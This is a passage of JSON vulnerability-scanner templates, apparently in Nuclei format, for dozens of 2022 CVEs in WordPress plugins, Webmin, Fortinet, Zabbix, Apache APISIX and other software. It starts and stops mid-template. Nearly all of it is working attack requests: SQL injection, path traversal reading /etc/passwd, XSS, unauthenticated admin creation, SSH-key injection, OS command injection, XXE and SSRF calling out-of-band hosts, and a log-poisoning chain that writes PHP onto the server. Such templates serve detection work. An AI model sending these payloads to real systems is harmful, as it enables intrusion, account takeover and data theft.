application/x-www-form-urlencoded\n\nowa_password={{password}}&owa_password2={{password}}&owa_k={{javascript_response}}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password\n"],"matchers":[{"type":"dsl","dsl":["contains(location,'owa_status_code=3006')","status_code==302"],"internal":true,"condition":"and"}]},{"raw":["POST /index.php?owa_do=base.loginForm&owa_site_id=& HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nowa_user_id=admin&owa_password={{password}}&owa_go=&owa_action=base.login&owa_submit_btn=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(set_cookie,'owa_p')","status_code==302"],"internal":true,"condition":"and"}]},{"raw":["GET /index.php?owa_do=base.optionsGeneral HTTP/1.1\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","group":1,"name":"nonce","internal":true,"regex":["name=\"owa_nonce\" value=\"([a-z0-9]+)\">"]}]},{"raw":["POST /index.php?owa_do=base.optionsGeneral HTTP/1.1\nHost: {{Hostname}}\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nContent-Type: application/x-www-form-urlencoded\n\nowa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[base.error_log_file]=owa-data/caches/{{randstr}}.php&owa_config[base.error_log_level]=2\n"]},{"raw":["POST /index.php?owa_do=base.optionsGeneral HTTP/1.1\nHost: {{Hostname}}\nCookie: owa_p={{http_4_owa_p}};owa_u=admin;\nContent-Type: application/x-www-form-urlencoded\n\nowa_action=base.optionsUpdate&owa_nonce={{nonce}}&owa_config[shell]=<?php+echo base64_decode('{{secret_b64}}');?>\n","GET /owa-data/caches/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[debug_log]","{{secret}}"],"condition":"and"}]}]},{"id":"CVE-2022-0846","info":{"name":"SpeakOut Email Petitions < 2.14.15.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Your signature has been added\") || contains(body, \"This petition has already been signed using your email address\")"],"condition":"and"}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32444","info":{"name":"u5cms v8.3.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/loginsave.php?u=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-33901","info":{"name":"WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34048","info":{"name":"Wavlink WN-533A8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=196.219.234.10&login_page=x\");alert(9);x=(\"&homepage=main.html&sysinitpage=sysinit.shtml&wizardpage=wiz.shtml&hostname=0.0.0.1&key=M94947765&password=ab4e98e4640b6c1ee88574ec0f13f908&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x\");alert(9);x=(\"?login=0\");</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36537","info":{"name":"ZK Framework - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /login.zul HTTP/1.1\nHost: {{Hostname}}\n","POST /zkau/upload?uuid=101010&dtid={{dtid}}&sid=0&maxsize=-1 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Length: 154\n\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp\nContent-Disposition: form-data; name=\"nextURI\"\n\n/WEB-INF/web.xml\n------WebKitFormBoundaryCs6yB0zvpfSBbYEp--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<display-name>.*</display-name>","<welcome-file-list>((.|\n)*)welcome-file-list>","xml version","web-app"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"dtid","group":1,"regex":["dt:'(.*?)',cu:"],"internal":true}]}]},{"id":"CVE-2022-0228","info":{"name":"Popup Builder < 4.0.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"first name\", \"last name\", \"email\")","contains(content_type_2, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28290","info":{"name":"WordPress Country Selector <1.6.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","country_selector_"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25488","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/ajax/avatar.php?id=-1+union+select+md5({{num}})%23"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/{{md5(num)}}","avatar-container"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DISABLE_CHECK_FOR_UPDATES]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA--\n","@timeout: 5s\nGET /index.php?module=dashboard/ HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(content_type_4, \"text/html\")","contains(body_4, \"<script>alert(document.domain)</script>\")","contains(body_4, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-0381","info":{"name":"WordPress Embed Swagger <=1.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/embed-swagger/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Embed Swagger","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["url: \"xss://\"-alert(document.domain)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-4059","info":{"name":"Cryptocurrency Widgets Pack < 2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=7","len(body_1) == 0","status_code_1 == 302","contains(body_2, \"Cryptocurrency Widgets Pack\")"],"condition":"and"}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1013","info":{"name":"WordPress Personal Dictionary <1.3.4 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 30s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=ays_pd_ajax&function=ays_pd_game_find_word&groupsIds[]=1)+AND+(SELECT+3066+FROM+(SELECT(SLEEP(7)))CEHy)--+-\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"\\\"status\\\":true,\")"],"condition":"and"}]}]},{"id":"CVE-2022-0412","info":{"name":"WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=7"]},{"type":"word","part":"body","words":["Product not found"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-47615","info":{"name":"LearnPress Plugin < 4.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"body","words":["\"status\":","\"pagination\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-31474","info":{"name":"BackupBuddy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36446","info":{"name":"Webmin <1.997 - Authenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}\n","POST /package-updates/update.cgi HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1\n\nmode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}","uid","gid","groups"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40684","info":{"name":"Fortinet - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v2/cmdb/system/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Node.js\nForwarded: by=\"[127.0.0.1]:1337\";for=\"[127.0.0.1]:1337\";proto=http;host=\nX-Forwarded-Vdom: root\n","PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Report Runner\nContent-Type: application/json\nForwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;\nContent-Length: 610\n\n {\n  \"ssh-public-key1\":\"{{randstr}}\"\n}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body_1","words":["ENC XXXX","http_method"],"condition":"and"},{"type":"word","part":"body_2","words":["Invalid SSH public key.","cli_error"],"condition":"and"}]}]},{"id":"CVE-2022-4325","info":{"name":"WordPress Post Status Notifier Lite <1.10.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=post-status-notifier-lite&controller=%3Cscript%3Ealert%28%60document.domain%60%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"<script>alert(`document.domain`)</script>\")","contains(body_2, \"Post Status Notifier Lite\")"],"condition":"and"}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40734","info":{"name":"Laravel Filemanager v2.5.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd","{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"],"stop-at-first-match":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0"]}]}]},{"id":"CVE-2022-31499","info":{"name":"Nortek Linear eMerge E3-Series <0.32-08f - Remote Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /card_scan.php?No=123&ReaderNo=`sleep%207`&CardFormatNo=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","contains(header, \"text/html\")","status_code == 200","contains(body, '{\\\"CardNo\\\":false')"],"condition":"and"}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23134","info":{"name":"Zabbix Setup Configuration Authentication Bypass","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/setup.php","{{BaseURL}}/setup.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"},"matchers-condition":"and","matchers":[{"type":"word","words":["Database","host","port","Zabbix"],"condition":"and"},{"type":"word","words":["youtube_main","support.google.com"],"part":"header","condition":"and","negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0533","info":{"name":"Ditty (formerly Ditty News Ticker) < 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=ditty&page=ditty_settings&tab=%22%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains_all(body_2, \"<img src onerror=alert(document.domain)>\", \"ditty\")"],"condition":"and"}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0787","info":{"name":"Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'iTotalDisplayRecords')"],"condition":"and"}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4447","info":{"name":"WordPress Fontsy <=1.8.6 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=-5219 UNION ALL SELECT NULL,NULL,NULL,md5({{num}}),NULL--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{{md5(num)}}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0786","info":{"name":"WordPress KiviCare <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ajax_get&route_name=get_doctor_details&clinic_id=%7B\"id\":\"1\"%7D&props_doctor_id=1,2)+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Doctor details\")"],"condition":"and"}]}]},{"id":"CVE-2022-34267","info":{"name":"RWS WorldServer - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /ws-api/v2/users/me/details?token=02 HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"fullName\":\"System\""]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n 